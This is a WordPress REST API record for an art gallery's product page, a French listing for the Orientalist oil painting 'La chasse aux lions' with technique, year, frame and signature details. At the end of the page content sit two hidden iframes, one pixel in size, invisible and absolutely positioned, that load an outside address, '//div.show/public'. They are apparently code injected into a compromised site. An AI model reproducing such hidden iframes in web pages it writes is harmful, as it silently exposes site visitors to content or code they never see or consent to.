{"id":5420,"date":"2024-09-07T16:04:19","date_gmt":"2024-09-07T14:04:19","guid":{"rendered":"https:\/\/meskinigallery.com\/?post_type=product&#038;p=5420"},"modified":"2025-01-21T11:36:06","modified_gmt":"2025-01-21T10:36:06","slug":"la-chasse-aux-lions","status":"publish","type":"product","link":"https:\/\/meskinigallery.com\/index.php\/product\/la-chasse-aux-lions\/","title":{"rendered":"La chasse aux lions"},"content":{"rendered":"<p>Titre\u00a0: <b>La chasse aux lions<\/b><\/p>\n<p>Courant artistique\u00a0: \u00a0<b>L&rsquo;orientalisme<\/b><\/p>\n<p>Technique\u00a0: <b>Huile sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2000<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><b>\u00ab Ce tableau fait partie d&rsquo;une s\u00e9rie d&rsquo;\u0153uvres artistiques li\u00e9es aux \u00e9pop\u00e9es et aux h\u00e9ros<\/b><\/p>\n<p><b>historiques. \u00bb<\/b><\/p>\n<p><a name=\"_GoBack\"><\/a> Cadre\u00a0: <b>Bois massif, double cadre cuivre vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Titre\u00a0: <strong>La chasse aux lions<\/strong><\/p>\n<p>Courant artistique\u00a0: \u00a0<strong>L&rsquo;orientalisme<\/strong><\/p>\n<p>Technique\u00a0: <strong>Huile sur toile<\/strong><\/p>\n<p>Ann\u00e9e\u00a0:<strong> 2000<\/strong><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><strong>\u00ab Ce tableau fait partie d&rsquo;une s\u00e9rie d&rsquo;\u0153uvres artistiques li\u00e9es aux \u00e9pop\u00e9es et aux h\u00e9ros<\/strong><\/p>\n<p><strong>\u00a0historiques. \u00bb<\/strong><\/p>\n<p>Cadre\u00a0: <strong>Bois massif, double cadre cuivre vernis<\/strong><\/p>\n<p>Signature\u00a0:<strong> En bas \u00e0 droite<\/strong><\/p>\n","protected":false},"featured_media":5079,"template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"product_brand":[],"product_cat":[45],"product_tag":[],"giftcard-category":[],"class_list":{"0":"post-5420","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-orientalisme","9":"instock","10":"taxable","11":"shipping-taxable","12":"product-type-simple","13":"product-grid-view"},"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5420","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":2,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5420\/revisions"}],"predecessor-version":[{"id":5627,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5420\/revisions\/5627"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media\/5079"}],"wp:attachment":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=5420"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=5420"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=5420"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=5420"},{"taxonomy":"giftcard-category","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/giftcard-category?post=5420"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}